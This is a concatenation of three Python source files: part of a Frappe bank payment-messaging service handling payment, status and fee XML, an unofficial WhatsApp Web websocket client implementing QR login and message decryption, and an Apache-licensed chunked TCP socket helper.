# Save Request Xml File to Server
save_xml_prtfy(req_xml_path, req_xml)
res_xml, req_bank_tx_id, doc_name = validate_payment_request(req_xml)
# Save Request Xml File to Database
save_payment_file_db(site_name, req_file_name, req_xml_path, private_path, req_path, doc_name)
args = {"req_bank_tx_id": req_bank_tx_id, "doc_name":doc_name}
status_timer = threading.Timer(10, on_time_event, kwargs=args)
#status_timer = threading.Thread(target=on_time_event, name="Downloader", kwargs=args)
status_timer.start()
# on_time_event(req_bank_tx_id, doc_name)
else:
res_xml, doc_name = create_payment_res_xml(const.BANK_HEADER_NAME, const.FP_HEADER, " ", " ", " ", " ", " ", " ", " ", " ", " ", " ", " ", " ", " ", " "," ", " ", " ", " ", " ", " ", " ", " ", " ", " ", " ", " ")
# Save Response Xml File to Server & Database
save_xml(res_xml_path, res_xml)
save_payment_file_db(site_name, res_file_name, res_xml_path, private_path, res_path, doc_name)
# Get Response Data
response = get_xml_response(res_xml)
return response
@frappe.whitelist(allow_guest=True)
def Status2():
# Get All Files Names & Paths
req_file_name, res_file_name, req_xml_path, res_xml_path, site_name, private_path, req_path, res_path = get_service_files_names('Status', 'StatusFileSerIn')
if frappe.request.data:
req_xml = frappe.request.data
# Save Request Xml File to Server
save_xml_prtfy(req_xml_path, req_xml)
res_xml, doc_name = validate_status_request(req_xml)
# Save Request Xml File to Database
save_status_file_db(site_name, req_file_name, req_xml_path, private_path, req_path, doc_name)
else:
res_xml, doc_name = create_status_res_xml(" ",const.BANK_HEADER_NAME, const.FP_HEADER, " ", " ", " ", " ", " ", " ", " ", " ", " ", " ", " ", " ", " ", " ", " ", const.TECHNICAL_ERROR, "false", " ", " ", " ", " ", " ", " ", " ", " ")
# Save Response Xml File to Server & Database
save_xml(res_xml_path, res_xml)
save_status_file_db(site_name, res_file_name, res_xml_path, private_path, res_path, doc_name)
# Get Response Data
response = get_xml_response(res_xml)
return response
def validate_verification_request(verification_xml):
fp_header, bank_header_id, bank_document_id, req_bank_id, req_bank_msg_id, biz_msg_idr, msg_def_idr, prtry_type, client_no, req_bank_cre_dt = read_xml_verification(verification_xml)
our_biz_msg_idr_serial = get_table_serial_key('VerificationSerialIn_RS')
if not validate_req_bank(req_bank_id):
verification_res, doc_name = create_verification_res_xml(client_no, "xxxxx", const.BANK_HEADER_NAME, req_bank_id, const.FP_HEADER, str(our_biz_msg_idr_serial), const.REQ_VERIFICATION_BIZ_MSG_IDR, const.RES_VERIFICATION_BIZ_MSG_IDR, biz_msg_idr, req_bank_msg_id, prtry_type, "false", const.WRONG_BIC, req_bank_cre_dt, " ", 1)
else:
if not validate_account_type(prtry_type):
verification_res, doc_name = create_verification_res_xml(client_no, "xxxxx", const.BANK_HEADER_NAME, req_bank_id, const.FP_HEADER, str(our_biz_msg_idr_serial), const.REQ_VERIFICATION_BIZ_MSG_IDR, const.RES_VERIFICATION_BIZ_MSG_IDR, biz_msg_idr, req_bank_msg_id, prtry_type, "false", const.USER_NOT_FOUND, req_bank_cre_dt, " ", 1)
else:
customer_name, customer_add, customer_no, customer_brn, region_unique_code, customer_error, error_flg = get_customer_details(client_no)
if error_flg == 1 and (customer_error == 'ca601' or customer_error == 'ca830' or customer_error == 'ca600'):
verification_res, doc_name = create_verification_res_xml(client_no, "xxxxx", const.BANK_HEADER_NAME, req_bank_id, const.FP_HEADER, str(our_biz_msg_idr_serial), const.REQ_VERIFICATION_BIZ_MSG_IDR, const.RES_VERIFICATION_BIZ_MSG_IDR, biz_msg_idr, req_bank_msg_id, prtry_type, "false", const.USER_BLOCKED, req_bank_cre_dt, customer_error, error_flg)
else:
if error_flg == 1:
verification_res, doc_name = create_verification_res_xml(client_no, "xxxxx", const.BANK_HEADER_NAME, req_bank_id, const.FP_HEADER, str(our_biz_msg_idr_serial), const.REQ_VERIFICATION_BIZ_MSG_IDR, const.RES_VERIFICATION_BIZ_MSG_IDR, biz_msg_idr, req_bank_msg_id, prtry_type, "false", const.USER_NOT_FOUND, req_bank_cre_dt, customer_error,error_flg )
else:
client_name = customer_name.strip() + '#' + customer_add.strip() + '#' + customer_brn.strip() + '#' + region_unique_code.strip()
verification_res, doc_name= create_verification_res_xml(client_no, client_name, const.BANK_HEADER_NAME, req_bank_id, const.FP_HEADER, str(our_biz_msg_idr_serial), const.REQ_VERIFICATION_BIZ_MSG_IDR, const.RES_VERIFICATION_BIZ_MSG_IDR, biz_msg_idr, req_bank_msg_id, prtry_type, "true", const.REQ_SUCCESS, req_bank_cre_dt, customer_error, error_flg)
return verification_res, doc_name
def validate_payment_request(payment_xml):
(header_from, header_to, req_bank_biz_msg_idr, req_bank_msg_def_idr, req_bank_cre_dt, req_bank_cre_dt_tm, req_bank_sttlm_mtd, req_bank_lcl_instrm,
req_bank_id, req_bank_tx_id, req_bank_intr_bk_sttlm_amt, req_bank_intr_bk_sttlm_amt_ccy, req_bank_accptnc_dt_tm, req_bank_chrg_br, req_bank_dbtr_name, req_bank_pstl_adr, req_bank_dbtr_ctct_dtls,
req_bank_debit_prt, req_bank_dbtr_acct_issr, req_bank_debit_id, req_bank_dbtr_agt_issr, req_bank_bldg_nb, req_bank_brnch_id, req_bank_cdtr_nm, req_bank_prtry_id, req_bank_acct_id, req_bank_ustrd) = read_xml_payment(payment_xml)
our_biz_msg_idr_serial = get_table_serial_key('PaymentSerialIn_RS')
payment_res, doc_name = create_payment_res_xml(header_from, header_to, req_bank_biz_msg_idr, req_bank_msg_def_idr, req_bank_cre_dt, req_bank_cre_dt_tm, req_bank_sttlm_mtd, req_bank_lcl_instrm, req_bank_id,
req_bank_tx_id, req_bank_intr_bk_sttlm_amt, req_bank_intr_bk_sttlm_amt_ccy, req_bank_accptnc_dt_tm, req_bank_chrg_br, req_bank_dbtr_name, req_bank_pstl_adr, req_bank_dbtr_ctct_dtls, req_bank_debit_prt, req_bank_dbtr_acct_issr,
req_bank_debit_id, req_bank_dbtr_agt_issr, req_bank_bldg_nb, req_bank_brnch_id, req_bank_cdtr_nm, req_bank_prtry_id, req_bank_acct_id, req_bank_ustrd, our_biz_msg_idr_serial)
return payment_res, req_bank_tx_id, doc_name
def on_time_event(req_bank_tx_id, doc_name):
frappe.init(site=get_current_site_name())
frappe.connect()
frappe.clear_cache()
timer_exceed_flg, status_received_flg, res_tx_sts = get_payment_status_flgs(doc_name)
if status_received_flg == 1 or timer_exceed_flg >= 1 or res_tx_sts != 'ACSC':
frappe.db.commit()
frappe.clear_cache()
frappe.db.close()
frappe.destroy()
return
update_timer_flg(doc_name, 1)
push_status_loop(req_bank_tx_id, doc_name)
frappe.db.commit()
frappe.clear_cache()
frappe.db.close()
frappe.destroy()
def push_status_loop(req_bank_tx_id, doc_name):
for counter in range(5):
psh_sts_flg = get_psh_status_flg(req_bank_tx_id)
if int(psh_sts_flg) == 99:
push_status(req_bank_tx_id, doc_name)
else:
break
def push_status(req_bank_tx_id, doc_name):
res_bank_id, res_bank_biz_msg, req_bank_biz_msg, req_bank_acct_id = get_payment_status_data(doc_name)
status_req_xml = create_push_status_xml_doc(req_bank_biz_msg, res_bank_id, res_bank_biz_msg, req_bank_tx_id)
req_file_name, res_file_name, req_xml_path, res_xml_path, site_name, private_path, req_path, res_path = get_service_files_names('PushStatus', 'StatusFileSerIn')
save_xml(req_xml_path, status_req_xml)
save_payment_file_db(site_name, req_file_name, req_xml_path, private_path, req_path, doc_name)
push_status_url = frappe.db.get_value("Bank Service Control", "253", ["rec_text"])
try:
headers = {'Content-Type': 'application/xml'}
res_xml = requests.post(url= push_status_url, data=status_req_xml.encode('utf-8'), headers=headers, timeout=15).text
save_xml_prtfy(res_xml_path, res_xml)
save_payment_file_db(site_name, res_file_name, res_xml_path, private_path, res_path, doc_name)
validate_push_status_res(res_xml, doc_name, req_bank_acct_id, req_bank_tx_id)
except requests.Timeout:
try:
update_psh_status(doc_name, '99', 'pushstatus time out')
except:
update_psh_status(doc_name, '99', '')
except:
try:
update_psh_status(doc_name, '99', sys.exc_info()[0])
except:
update_psh_status(doc_name, '99', '')
def validate_push_status_res(status_res_xml, doc_name, rv_req_bank_acct_id, req_bank_tx_id):
(header_from, header_to, req_bank_biz_msg_idr, req_bank_msg_def_idr, req_bank_cre_dt, res_bank_biz_msg_idr, res_bank_msg_def_idr, res_bank_cre_dt,
req_bank_cre_dt_tm, req_bank_msg_id, req_bank_id, res_orgnl_msg_id, res_orgnl_msg_nm_id, res_orgnl_cre_dt_tm, req_orgnl_tx_id, req_tx_sts,
req_intr_bk_sttl_amt, req_nm, req_adr_line, req_bank_client_id, req_bank_prtry_id) = read_push_status_xml(status_res_xml)
if rv_req_bank_acct_id == req_bank_client_id and req_bank_tx_id == req_orgnl_tx_id:
if req_tx_sts == 'ACSC':
customer_no, customer_error, error_flg = req_bank_client_id, '', 0
snd_fee, swf_fee, rcv_fee = "0", get_transfer_fee(req_orgnl_tx_id, doc_name),"0"
customer_no, customer_error, error_flg = make_payment_for_customer(customer_no, req_intr_bk_sttl_amt, req_orgnl_tx_id, req_bank_prtry_id, req_bank_id, snd_fee, swf_fee, rcv_fee)
if int(error_flg) == 1:
update_psh_status(doc_name, '0', req_tx_sts, customer_error)
else:
update_psh_status(doc_name, '1', req_tx_sts)
else:
update_psh_status(doc_name, '0', req_tx_sts)
else:
update_psh_status(doc_name, '0', req_tx_sts)
def get_transfer_fee(req_orgnl_tx_id, doc_name):
ret_fees, our_zone_code = "0", "00"
#doc_name = frappe.db.get_value("Bank Payment Received", {"req_bank_tx_id":req_orgnl_tx_id}, ["name"])
req_file_name, res_file_name, req_xml_path, res_xml_path, site_name, private_path, req_path, res_path = get_service_files_names('Fees', 'StatusFileSerIn')
res_bank_id, req_bank_id, req_bank_bldg, req_bank_acct, req_bank_amt, currency_code, fees_password, our_zone_code, fees_url, fetch_fees = get_fees_data(doc_name)
if fetch_fees == 0:
return "0"
fees_xml_req = create_fees_xml_doc(req_xml_path, req_bank_id, fees_password, str(req_bank_amt).strip(), res_bank_id, req_bank_bldg, our_zone_code, currency_code, req_orgnl_tx_id)
save_payment_file_db(site_name, req_file_name, req_xml_path, private_path, req_path, doc_name)
req_fees_url = fees_url#frappe.db.get_value("Bank Service Control", "260", ["rec_text"])
try:
headers = {'Content-Type': 'application/xml'}
session = requests.Session()
retry = Retry(connect=3, backoff_factor=0.5)
adapter = HTTPAdapter(max_retries=retry)
session.mount('http://', adapter)
session.mount('https://', adapter)
res_xml = session.post(url= req_fees_url, data=fees_xml_req.encode("utf-8"), headers=headers).text
with open(res_xml_path, "w") as f:
f.write(res_xml)
f.close()
save_payment_file_db(site_name, res_file_name, res_xml_path, private_path, res_path, doc_name)
retail, switch, interchange, result, transactionid, errordesc = read_xml_fees_data(res_xml)
update_payment_fees_data(doc_name, retail, switch, interchange, transactionid, result, errordesc)
ret_fees = interchange
except:
try:
update_payment_fees_data(doc_name, "0", "0", "0", "", "error", sys.exc_info()[0])
except:
update_payment_fees_data(doc_name, "0", "0", "0", "", "error", '')
return "0"
def validate_status_request(status_xml):
(header_from, header_to, req_bank_biz_msg_idr, req_bank_msg_def_idr, req_bank_cre_dt, res_bank_biz_msg_idr, res_bank_msg_def_idr, res_bank_cre_dt,
req_bank_cre_dt_tm, req_bank_msg_id, req_bank_id, res_orgnl_msg_id, res_orgnl_msg_nm_id, res_orgnl_cre_dt_tm, req_orgnl_tx_id, req_tx_sts,
req_intr_bk_sttl_amt, req_intr_bk_sttl_amt_ccy, req_nm, req_adr_line, req_bank_client_id, req_bank_prtry_id, req_accptnc_dt_tm) = read_status_xml(status_xml)
our_biz_msg_idr_serial = get_table_serial_key('StatusSerialIn_RS')
(res_status, payment_doc_name, rv_req_bank_id, rv_req_bank_acct_id, rv_req_bank_prtry_id, rv_req_bank_intr_bk_sttlm_amt, rv_req_bank_intr_bk_sttlm_amt_ccy,
rv_res_bank_tx_sts, rv_timer_exceed_flg, rv_status_recieved_flg, rv_req_bank_debit_id, rv_req_bank_debit_prt) = get_status_data(req_orgnl_tx_id)
req_bank_accptnc_dt_tm = ''
# print(res_status, payment_doc_name, rv_req_bank_id, rv_req_bank_acct_id, rv_req_bank_prtry_id, rv_req_bank_intr_bk_sttlm_amt, rv_req_bank_intr_bk_sttlm_amt_ccy,
# rv_res_bank_tx_sts, rv_timer_exceed_flg, rv_status_recieved_flg, rv_req_bank_debit_id, rv_req_bank_debit_prt)
#or req_bank_prtry_id != rv_req_bank_prtry_id or req_bank_id != rv_req_bank_id or req_bank_client_id != rv_req_bank_acct_id
if not validate_req_bank(req_bank_id) or not res_status or rv_res_bank_tx_sts != 'ACSC' or req_bank_prtry_id != rv_req_bank_prtry_id or req_bank_id != rv_req_bank_id or req_bank_client_id != rv_req_bank_acct_id or rv_req_bank_intr_bk_sttlm_amt_ccy != req_intr_bk_sttl_amt_ccy or float(rv_req_bank_intr_bk_sttlm_amt) != float(req_intr_bk_sttl_amt):
status_res_xml, doc_name = create_status_res_xml(str(our_biz_msg_idr_serial), header_from, header_to, req_bank_id, req_bank_biz_msg_idr, req_bank_msg_def_idr,
req_bank_cre_dt, res_bank_biz_msg_idr, res_bank_msg_def_idr, res_bank_cre_dt, req_bank_msg_id, req_bank_cre_dt_tm, req_bank_accptnc_dt_tm,
res_orgnl_msg_id, res_orgnl_msg_nm_id, res_orgnl_cre_dt_tm, req_orgnl_tx_id, req_accptnc_dt_tm, "TNFN", "false", req_intr_bk_sttl_amt, req_intr_bk_sttl_amt_ccy,
req_adr_line, req_nm, req_bank_client_id, req_bank_prtry_id, rv_req_bank_debit_id, rv_req_bank_debit_prt)
else:
if int(rv_timer_exceed_flg) > 0:
status_res_xml, doc_name = create_status_res_xml(str(our_biz_msg_idr_serial), header_from, header_to, req_bank_id, req_bank_biz_msg_idr, req_bank_msg_def_idr,
req_bank_cre_dt, res_bank_biz_msg_idr, res_bank_msg_def_idr, res_bank_cre_dt, req_bank_msg_id, req_bank_cre_dt_tm, req_bank_accptnc_dt_tm,
res_orgnl_msg_id, res_orgnl_msg_nm_id, res_orgnl_cre_dt_tm, req_orgnl_tx_id, req_accptnc_dt_tm, "LTXD", "false", req_intr_bk_sttl_amt, req_intr_bk_sttl_amt_ccy,
req_adr_line, req_nm, req_bank_client_id, req_bank_prtry_id, rv_req_bank_debit_id, rv_req_bank_debit_prt)
else:
if int(rv_status_recieved_flg > 0):
status_res_xml, doc_name = create_status_res_xml(str(our_biz_msg_idr_serial), header_from, header_to, req_bank_id, req_bank_biz_msg_idr, req_bank_msg_def_idr,
req_bank_cre_dt, res_bank_biz_msg_idr, res_bank_msg_def_idr, res_bank_cre_dt, req_bank_msg_id, req_bank_cre_dt_tm, req_bank_accptnc_dt_tm,
res_orgnl_msg_id, res_orgnl_msg_nm_id, res_orgnl_cre_dt_tm, req_orgnl_tx_id, req_accptnc_dt_tm, "DTID", "false", req_intr_bk_sttl_amt, req_intr_bk_sttl_amt_ccy,
req_adr_line, req_nm, req_bank_client_id, req_bank_prtry_id, rv_req_bank_debit_id, rv_req_bank_debit_prt)
else:
customer_no, customer_error, error_flg = req_bank_client_id, '', 0
snd_fee, swf_fee, rcv_fee = "0", get_transfer_fee(req_orgnl_tx_id, payment_doc_name),"0"
customer_no, customer_error, error_flg = make_payment_for_customer(customer_no, req_intr_bk_sttl_amt, req_orgnl_tx_id, rv_req_bank_debit_id, req_bank_id, snd_fee, swf_fee, rcv_fee)
if error_flg == 1:
update_psh_status(payment_doc_name, '0', 'Server Error', customer_error)
status_res_xml, doc_name = create_status_res_xml(str(our_biz_msg_idr_serial), header_from, header_to, req_bank_id, req_bank_biz_msg_idr, req_bank_msg_def_idr,
req_bank_cre_dt, res_bank_biz_msg_idr, res_bank_msg_def_idr, res_bank_cre_dt, req_bank_msg_id, req_bank_cre_dt_tm, req_bank_accptnc_dt_tm,
res_orgnl_msg_id, res_orgnl_msg_nm_id, res_orgnl_cre_dt_tm, req_orgnl_tx_id, req_accptnc_dt_tm, customer_error, "false", req_intr_bk_sttl_amt, req_intr_bk_sttl_amt_ccy,
req_adr_line, req_nm, req_bank_client_id, req_bank_prtry_id, rv_req_bank_debit_id, rv_req_bank_debit_prt)
else:
update_status_flg(payment_doc_name, '1')
status_res_xml, doc_name = create_status_res_xml(str(our_biz_msg_idr_serial), header_from, header_to, req_bank_id, req_bank_biz_msg_idr, req_bank_msg_def_idr,
req_bank_cre_dt, res_bank_biz_msg_idr, res_bank_msg_def_idr, res_bank_cre_dt, req_bank_msg_id, req_bank_cre_dt_tm, req_bank_accptnc_dt_tm,
res_orgnl_msg_id, res_orgnl_msg_nm_id, res_orgnl_cre_dt_tm, req_orgnl_tx_id, req_accptnc_dt_tm, "ACSC", "true", req_intr_bk_sttl_amt, req_intr_bk_sttl_amt_ccy,
req_adr_line, req_nm, req_bank_client_id, req_bank_prtry_id, rv_req_bank_debit_id, rv_req_bank_debit_prt)
return status_res_xml, doc_name
|
whatsapp.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys;
sys.dont_write_bytecode = True;
import os;
import signal;
import base64;
import math;
import time;
import datetime;
import json;
import io;
from time import sleep;
from threading import Thread;
from Crypto.Cipher import AES;
from Crypto.Hash import SHA256;
import hashlib;
import hmac;
import traceback;
import websocket;
import curve25519;
import pyqrcode;
from utilities import *;
from whatsapp_binary_reader import whatsappReadBinary;
reload(sys);
sys.setdefaultencoding("utf-8");
def HmacSha256(key, sign):
return hmac.new(key, sign, hashlib.sha256).digest();
def HKDF(key, length, appInfo=""): # implements RFC 5869, some parts from https://github.com/MirkoDziadzka/pyhkdf
key = HmacSha256("\0"*32, key);
keyStream = "";
keyBlock = "";
blockIndex = 1;
while len(keyStream) < length:
keyBlock = hmac.new(key, msg=keyBlock+appInfo+chr(blockIndex), digestmod=hashlib.sha256).digest();
blockIndex += 1;
keyStream += keyBlock;
return keyStream[:length];
def AESPad(s):
bs = AES.block_size;
return s + (bs - len(s) % bs) * chr(bs - len(s) % bs);
def AESUnpad(s):
return s[:-ord(s[len(s)-1:])];
def AESEncrypt(key, plaintext): # like "AESPad"/"AESUnpad" from https://stackoverflow.com/a/21928790
plaintext = AESPad(plaintext);
iv = os.urandom(AES.block_size);
cipher = AES.new(key, AES.MODE_CBC, iv);
return iv + cipher.encrypt(plaintext);
def WhatsAppEncrypt(encKey, macKey, plaintext):
enc = AESEncrypt(encKey, plaintext)
return enc + HmacSha256(macKey, enc); # this may need padding to 64 byte boundary
def AESDecrypt(key, ciphertext): # from https://stackoverflow.com/a/20868265
iv = ciphertext[:AES.block_size];
cipher = AES.new(key, AES.MODE_CBC, iv);
plaintext = cipher.decrypt(ciphertext[AES.block_size:]);
return AESUnpad(plaintext);
class WhatsAppWebClient:
websocketIsOpened = False;
onOpenCallback = None;
onMessageCallback = None;
onCloseCallback = None;
activeWs = None;
websocketThread = None;
messageQueue = {}; # maps message tags (provided by WhatsApp) to more information (description and callback)
loginInfo = {
"clientId": None,
"serverRef": None,
"privateKey": None,
"publicKey": None,
"key": {
"encKey": None,
"macKey": None
}
};
connInfo = {
"clientToken": None,
"serverToken": None,
"browserToken": None,
"secret": None,
"sharedSecret": None,
"me": None
};
def __init__(self, onOpenCallback, onMessageCallback, onCloseCallback):
self.onOpenCallback = onOpenCallback;
self.onMessageCallback = onMessageCallback;
self.onCloseCallback = onCloseCallback;
websocket.enableTrace(True);
self.connect();
def onOpen(self, ws):
try:
self.websocketIsOpened = True;
if self.onOpenCallback is not None and "func" in self.onOpenCallback:
self.onOpenCallback["func"](self.onOpenCallback);
eprint("WhatsApp backend Websocket opened.");
except:
eprint(traceback.format_exc());
def onError(self, ws, error):
eprint(error);
def onClose(self, ws):
self.websocketIsOpened = False;
if self.onCloseCallback is not None and "func" in self.onCloseCallback:
self.onCloseCallback["func"](self.onCloseCallback);
eprint("WhatsApp backend Websocket closed.");
def onMessage(self, ws, message):
try:
messageSplit = message.split(",", 1);
messageTag = messageSplit[0];
messageContent = messageSplit[1];
if messageTag in self.messageQueue: # when the server responds to a client's message
pend = self.messageQueue[messageTag];
if pend["desc"] == "_login":
eprint("Message after login: ", message);
self.loginInfo["serverRef"] = json.loads(messageContent)["ref"];
eprint("set server id: " + self.loginInfo["serverRef"]);
self.loginInfo["privateKey"] = curve25519.Private();
self.loginInfo["publicKey"] = self.loginInfo["privateKey"].get_public();
qrCodeContents = self.loginInfo["serverRef"] + "," + base64.b64encode(self.loginInfo["publicKey"].serialize()) + "," + self.loginInfo["clientId"];
eprint("qr code contents: " + qrCodeContents);
svgBuffer = io.BytesIO(); # from https://github.com/mnooner256/pyqrcode/issues/39#issuecomment-207621532
pyqrcode.create(qrCodeContents, error='L').svg(svgBuffer, scale=6, background="rgba(0,0,0,0.0)", module_color="#122E31", quiet_zone=0);
if "callback" in pend and pend["callback"] is not None and "func" in pend["callback"] and pend["callback"]["func"] is not None and "tag" in pend["callback"] and pend["callback"]["tag"] is not None:
pend["callback"]["func"]({ "type": "generated_qr_code", "image": "data:image/svg+xml;base64," + base64.b64encode(svgBuffer.getvalue()), "content": qrCodeContents }, pend["callback"]);
else:
try:
jsonObj = json.loads(messageContent); # try reading as json
except ValueError, e:
if messageContent != "":
hmacValidation = HmacSha256(self.loginInfo["key"]["macKey"], messageContent[32:]);
if hmacValidation != messageContent[:32]:
raise ValueError("Hmac mismatch");
decryptedMessage = AESDecrypt(self.loginInfo["key"]["encKey"], messageContent[32:]);
try:
processedData = whatsappReadBinary(decryptedMessage, True);
messageType = "binary";
except:
processedData = { "traceback": traceback.format_exc().splitlines() };
messageType = "error";
finally:
self.onMessageCallback["func"](processedData, self.onMessageCallback, { "message_type": messageType });
else:
self.onMessageCallback["func"](jsonObj, self.onMessageCallback, { "message_type": "json" });
if isinstance(jsonObj, list) and len(jsonObj) > 0: # check if the result is an array
eprint(json.dumps(jsonObj));
if jsonObj[0] == "Conn":
self.connInfo["clientToken"] = jsonObj[1]["clientToken"];
self.connInfo["serverToken"] = jsonObj[1]["serverToken"];
self.connInfo["browserToken"] = jsonObj[1]["browserToken"];
self.connInfo["me"] = jsonObj[1]["wid"];
self.connInfo["secret"] = base64.b64decode(jsonObj[1]["secret"]);
self.connInfo["sharedSecret"] = self.loginInfo["privateKey"].get_shared_key(curve25519.Public(self.connInfo["secret"][:32]), lambda a: a);
sse = self.connInfo["sharedSecretExpanded"] = HKDF(self.connInfo["sharedSecret"], 80);
hmacValidation = HmacSha256(sse[32:64], self.connInfo["secret"][:32] + self.connInfo["secret"][64:]);
if hmacValidation != self.connInfo["secret"][32:64]:
raise ValueError("Hmac mismatch");
keysEncrypted = sse[64:] + self.connInfo["secret"][64:];
keysDecrypted = AESDecrypt(sse[:32], keysEncrypted);
self.loginInfo["key"]["encKey"] = keysDecrypted[:32];
self.loginInfo["key"]["macKey"] = keysDecrypted[32:64];
# eprint("private key : ", base64.b64encode(self.loginInfo["privateKey"].serialize()));
# eprint("secret : ", base64.b64encode(self.connInfo["secret"]));
# eprint("shared secret : ", base64.b64encode(self.connInfo["sharedSecret"]));
# eprint("shared secret expanded : ", base64.b64encode(self.connInfo["sharedSecretExpanded"]));
# eprint("hmac validation : ", base64.b64encode(hmacValidation));
# eprint("keys encrypted : ", base64.b64encode(keysEncrypted));
# eprint("keys decrypted : ", base64.b64encode(keysDecrypted));
eprint("set connection info: client, server and browser token; secret, shared secret, enc key, mac key");
eprint("logged in as " + jsonObj[1]["pushname"] + " (" + jsonObj[1]["wid"] + ")");
elif jsonObj[0] == "Stream":
pass;
elif jsonObj[0] == "Props":
pass;
except:
eprint(traceback.format_exc());
def connect(self):
self.activeWs = websocket.WebSocketApp("wss://w1.web.whatsapp.com/ws",
on_message = lambda ws, message: self.onMessage(ws, message),
on_error = lambda ws, error: self.onError(ws, error),
on_open = lambda ws: self.onOpen(ws),
on_close = lambda ws: self.onClose(ws),
header = { "Origin: https://web.whatsapp.com" });
self.websocketThread = Thread(target = self.activeWs.run_forever);
self.websocketThread.daemon = True;
self.websocketThread.start();
def generateQRCode(self, callback=None):
self.loginInfo["clientId"] = base64.b64encode(os.urandom(16));
messageTag = str(getTimestamp());
self.messageQueue[messageTag] = { "desc": "_login", "callback": callback };
message = messageTag + ',["admin","init",[0,2,9929],["Chromium at ' + datetime.datetime.now().isoformat() + '","Chromium"],"' + self.loginInfo["clientId"] + '",true]';
self.activeWs.send(message);
def getLoginInfo(self, callback):
callback["func"]({ "type": "login_info", "data": self.loginInfo }, callback);
def getConnectionInfo(self, callback):
callback["func"]({ "type": "connection_info", "data": self.connInfo }, callback);
def disconnect(self):
self.activeWs.send('goodbye,,["admin","Conn","disconnect"]'); # WhatsApp server closes connection automatically when client wants to disconnect
#time.sleep(0.5);
#self.activeWs.close();
|
chunkystreamsocket.py
|
#!/usr/bin/env python3
# vim ts=4,fileencoding=utf-8
# SPDX-License-Identifier: Apache-2.0
# SPDXID: pymisclib-1
# PackageCopyrightText: © Copyright 2012-2022 by Christian Dönges <cd@platypus-projects.de>
# PackageDownloadLocation: None
# PackageHomePage: https://github.com/cdoenges/pymisclib
# PackageName: pymisclib
# PackageOriginator: Originator: Platypus Projects GmbH
# PackageSourceInfo: <text>uses pymisclib from https://github.com/cdoenges/pymisclib.</text>
# PackageSupplier: Christian Dönges (cd@platypus-projects.de)
# PackageVersion: 1.0.0
"""A socket used to send and receive message chunks over a TCP connection.
:LICENSE:
© Copyright 2017 by Christian Dönges <cd@platypus-projects.de>
Licensed under the Apache License, Version 2.0 (the "License"); you may
not use this file except in compliance with the License. You may obtain a
copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
If you need another license, contact the author to discuss terms.
"""
# pylint: disable=consider-using-assignment-expr
from dataclasses import dataclass
import logging
import socket
@dataclass
class ChunkyStreamSocket:
"""Socket used to send message chunks over a TCP connection."""
host: str = '127.0.0.1'
port: int = 10000
sock: socket.socket = None
logger: logging.Logger = logging.getLogger(__name__)
debug: bool = False
log_n_bytes: int = 0 # number of communicated bytes to log
_backlog_bytes: bytes = None
def __post_init__(self):
"""Custom initializer called after __init__().
"""
if self.sock is None:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def bind_and_listen(self, backlog: int = 5, timeout: float = None):
"""Bind to the host and port to make a server socket.
: param int backlog: The maximum number of queued connections.
: param float timeout: The number of seconds after which socket
operations will time out. Set to None for a blocking socket.
"""
self.logger.debug('bind_and_listen(%s:%u)', self.host, self.port)
# Set the timeout.
self.sock.settimeout(timeout)
# Allow the server socket to re-bind immediately.
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Bind the socket to the given address and port.
self.sock.bind((self.host, self.port))
# Start listening for a connection attempt.
self.sock.listen(backlog)
def accept(self) -> tuple[int, tuple[str, int]]:
"""Accept a client connection on the (server) socket.
:return: The client socket and client address tuple.
:rtype tuple(socket, tuple(host, port))
:raises: TimeoutError
"""
try:
(client_sock, client_addr) = self.sock.accept() # pylint: disable=no-member
except socket.timeout as ex:
raise TimeoutError('accept() timed out') from ex
self.logger.debug('accept(%s)', client_addr)
return (client_sock, client_addr)
def close(self):
"""Close the socket."""
try:
self.sock.shutdown(socket.SHUT_RDWR)
except OSError:
# Ignore errors in shutdown since we close the socket anyways.
pass
self.sock.close()
self.sock = None
self.logger.debug('close()')
def connect(self, timeout: float = None):
"""Connect client socket to the server at host:port.
:param float timeout: The number of seconds after which socket
operations will time out. Set to None for a blocking socket.
:raises: ConnectionError
"""
self.logger.debug('connect(%s:%u)', self.host, self.port)
# Set the timeout.
self.sock.settimeout(timeout)
# Allow server socket to re-bind immediately.
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
self.sock.connect((self.host, self.port))
except OSError as ex:
self.logger.error('Connection attempt to %s:%u failed: %s',
self.host, self.port, ex)
raise ConnectionError('unable to connect') from ex
self.logger.debug('Connected to %s:%s', self.host, self.port)
def send(self, msg_bytes: bytes) -> int:
"""Send the bytes.
:Parameters:
msg_bytes -- The bytes to send. If the receiver is expecting a
separator, it must be appended to the message by the caller.
:Return:
The number of bytes sent.
:Raises:
RuntimeError
"""
total_nr_sent = 0
while total_nr_sent < len(msg_bytes):
current_nr_sent = self.sock.send(msg_bytes[total_nr_sent:])
if current_nr_sent == 0:
self.logger.debug('self.sock.send() failed.')
raise RuntimeError("socket connection broken")
total_nr_sent = total_nr_sent + current_nr_sent
if self.log_n_bytes != 0:
self.logger.debug('--> %s', msg_bytes[:self.log_n_bytes])
return total_nr_sent
def recv(self, length: int, timeout: float = None):
"""Receive length bytes from the socket.
This function handles chunked data (i.e. the data to receive is split
into multiple packets). If more data than expected is received, it is
placed into a backlog buffer until the next call to a receive
function.
:Parameters:
length -- The number of bytes to read.
timeout -- Timeout in seconds or None to block.
:Return:
The received bytes.
:Raises:
RuntimeError
TimeoutError
"""
chunks = []
nr_received = 0
# Retrieve the backlog from the previous recv() call and use it as the
# first chunk.
if self._backlog_bytes is not None:
chunks.append(self._backlog_bytes)
nr_received = len(self._backlog_bytes)
self._backlog_bytes = None
# Set the timeout.
self.sock.settimeout(timeout)
# Receive bytes until we have enough to satisfy the length requirement.
while nr_received < length:
recv_len = min(length - nr_received, 4096)
chunk = self.sock.recv(recv_len)
if self.debug:
self.logger.debug('socket.recv(%u) := %s', recv_len, chunk)
if chunk == b'':
raise RuntimeError("socket connection broken")
chunks.append(chunk)
nr_received = nr_received + len(chunk)
# Join all chunks into one message.
msg_bytes = b''.join(chunks)
# Cut off the part that is too long.
if len(msg_bytes) > length:
self._backlog_bytes = msg_bytes[length:]
